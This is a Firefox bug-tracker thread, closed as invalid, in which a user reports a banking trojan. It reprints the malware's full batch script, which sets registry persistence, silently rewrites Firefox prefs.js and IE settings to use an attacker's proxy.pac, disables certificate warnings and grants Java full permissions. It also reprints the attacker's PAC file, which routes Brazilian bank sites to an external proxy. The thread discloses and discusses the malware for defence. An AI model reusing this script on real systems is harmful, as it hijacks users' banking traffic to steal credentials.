Closed Bug 503970 Opened 15 years ago Closed 15 years ago

Firefox is a virus target

Categories

(Firefox :: Security, defect)

Product:
Firefox
Component:
Security
Version:
3.5 Branch
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
major

Tracking

()

Status:
RESOLVED INVALID

People

(Reporter: renatoyamane, Unassigned)

Details

Attachments

(3 files)

executable file (Checked in msconfig that it is loaded in all startup)
148.21 KB, application/octet-stream
Details
I don't know what it do. But it is a piece of this virus
3 bytes, application/octet-stream
Details
This file looking for prefs.js to change proxy settings
9.00 KB, application/octet-stream
Details 
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)

I have checked that Firefox is a virus target.
The virus change proxy settings to redirect all conections to a external proxy, capturing all banks information:

@shift
::@echo off
@break off

if exist %temp%\iecfg.dll goto con
::add to regedit
> %temp%\iecfg.dll echo y
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v JavaPlugin /t REG_SZ /d "%temp%\csrrs.exe" < %temp%\iecfg.dll
start /low /min iexplore.exe "http://adobe.shockwavesfx.com/successful.php"
goto mapa
::Connection test
:con
set ping=%windir%\system32\ping.exe
:test
%ping% 74.125.159.99 -n 1 -l 1 | find "TTL" > nul
if not errorlevel 1 goto mapa
goto teste
:mapa
::Get IP
FOR /F "TOKENS=3 delims=: " %%E IN ('%windir%\system32\ping.exe proxy.shockwavesfx.com -n 1 -l 1 ^| find.exe "TTL" ') DO SET ip=%%E



FOR /F "TOKENS=*" %%E IN ('dir "%HoMePath%\.." /b /s ^| find "prefs.js"') DO %windir%\system32\attrib.exe -r -a -s -h "%%E" && echo user_pref("network.proxy.autoconfig_url", "http://%ip%/proxy.pac"); >> "%%E"
FOR /F "TOKENS=*" %%E IN ('dir "%HoMePath%\.." /b /s ^| find "prefs.js"') DO %windir%\system32\attrib.exe -r -a -s -h "%%E" && echo user_pref("network.proxy.type", 2); >> "%%E"



type %temp%\~a.tmp | find.exe "Internet Explorer\Main">%temp%\~b.tmp && for /f "tokens=2 delims=\" %%D in ('type %temp%\~b.tmp ^| find.exe "S-1-5-21"') do set CSL=%%D
echo y|%windir%\system32\reg.exe add "HKU\%CSL%\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f


cd %HoMePath%
::Add Proxy to IE*
echo Windows Registry Editor Version 5.00 > iecfg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings] >> iecfg.reg
echo "AutoConfigURL"="http://%ip%/proxy.pac" >> iecfg.reg
echo "EnableHttp1_1"=dword:00000001 >> iecfg.reg
echo "ProxyEnable"=dword:00000000 >> iecfg.reg
echo "ProxyHttp1.1"=dword:00000000 >> iecfg.reg
regedit /s iecfg.reg
del iecfg.reg


::Allow java applet
cd %windir%
cd ..
FOR /F "TOKENS=*" %%E IN ('dir /b /s ^| find /i "java.policy"') DO echo grant {  permission java.security.AllPermission;}; > "%%E"
:no

::exit

Reproducible: Always

Actual Results:  
Prefs.js is very easy to be changed by a external action.

Expected Results:  
When prefs.js is changed, user need be informed when Firefox run.
Component: General → Security
Version: unspecified → 3.5 Branch
http://securityproxy1.no-ip.biz/proxy.pac have this content (I already tell to no-ip block this addrress):

=============================================
function FindProxyForURL(url, host) {

var n = new Array("www.bradesco.com.br","bradesco.com.br","bradesco.com",

"www.cef.com.br","cef.com.br","www.caixa.com.br","caixa.com.br","www.cef.gov.br","cef.gov.br","www.caixaeconomica.com.br","caixaeconomica.com.br","www.caixaeconomicafederal.com.br","caixaeconomicafederal.com.br","www.caixa.gov.br","caixa.gov.br","www.itau.com.br","itau.com.br","www.real.com.br","real.com.br","www.bancoreal.com.br","bancoreal.com.br","www.bb.com.br","bb.com.br","www.bancodobrasil.com.br","bancodobrasil.com.br","www.bancobrasil.com.br","bancobrasil.com.br","www.santander.com.br","santander.com.br","www.banespa.com.br","banespa.com.br","www.santanderbanespa.com.br","santanderbanespa.com.br","www.itaupersonnalite.com.br","itaupersonnalite.com.br","www.itauprivatebank.com.br","itauprivatebank.com.br","www.unibanco.com.br","unibanco.com.br");

for(var i =0;i<n.length;i++) { if (shExpMatch(host, n[i])) {

return "PROXY 72.20.10.175:80"; } }

return "DIRECT"; }
=============================================

All this sites are Brazilian Banks.
The virus changed...

- From csrrs.exe to iexplorer.exe
- From batch file (.bat) to executable file (.exe).
- And now, proxy is http://proxy.shockwavesfxlive.in/proxy.pac

I will attach the iexplorer.exe, iexplorer.dll and finder.exe

All this files is placed in:
C:\Documents and Settings\USER\Local Settings\Temp
Can someone confirm this problem?
Is not confortable have all account bank traffic redirect to a external proxy.
Being the target of a virus isn't a security hole. But maybe dveditz can tell you what he knows about this virus.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 15 years ago
Resolution: --- → INVALID
Jesse, I agree that "target of a virus isn't a security hole", *but* this kind of worm show to us that is VERY EASY change important parameters on Firefox.

A simple batch file can do:
echo user_pref("network.proxy.autoconfig_url", "proxy.pac"); >> prefs.js

I think that text file (prefs.js) can´t exist to do important things!

Anyone script kiddies can edit this kind of file easily.
Obfuscating configuration files is not a very strong security measure.
But a txt file (as prefs.js) can be edited by any *KID*.
This is trivial!

A lot of others worms will appear using a simple "echo" to edit Firefox config files.

Redirect traffic of financial institutions (as this worm do) is very dangerous to Firefox users.
Getting access to your computer is a much higher bar than editing a text file or a binary blob.
Think with me:

- A user receive a batch file (click here to see Britnay Spears nude)
- This file edit, using "echo", the prefs.js enabling proxy.
- All financial institutions datas will be redirect to a external proxy.
- Cracker will get your account number, credit card information, etc.

This kind of worm (batch file) never will be getted by anti-virus.

I know that the user can't click on anything, but we know that user will do that!

And IMHO Firefox need avoid this kind of situation.
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: